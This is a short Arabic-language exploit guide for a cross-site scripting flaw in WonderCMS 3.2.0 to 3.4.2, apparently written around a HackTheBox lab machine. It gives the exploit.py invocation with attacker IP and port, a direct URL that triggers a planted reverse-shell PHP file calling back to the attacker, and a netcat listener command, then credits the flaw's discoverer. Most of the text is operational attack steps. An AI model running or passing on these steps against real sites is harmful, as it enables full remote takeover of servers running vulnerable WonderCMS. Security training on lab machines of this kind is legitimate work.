
حقن Xss، WonderCMS 3.2.0 -3.4.2
WonderCMS الإصدارات من 3.2.0 إلى 3.4.2 تحتوي على ثغرة. يمكن للمهاجمين عن بُعد السيطرة الكاملة على الخادم باستخدام استغلال Cross-Site Scripting (XSS) (لأغراض تعليمية فقط). إليك خطة العمل:
يستغل الاستغلال مكوّن installModule في WonderCMS لإدخال سكربت مُعدّ بدقة ينفّذ أكوادًا عشوائية.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
مثال
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
إذا لم يتم تفعيل الـ reverse shell تلقائيًا، انتقل مباشرة إلى:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
تذكّر تشغيل مستمع باستخدام الأمر التالي:
nc -lvp 4444
prodigiousMind لاكتشافه والإبلاغ عن الثغرة https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413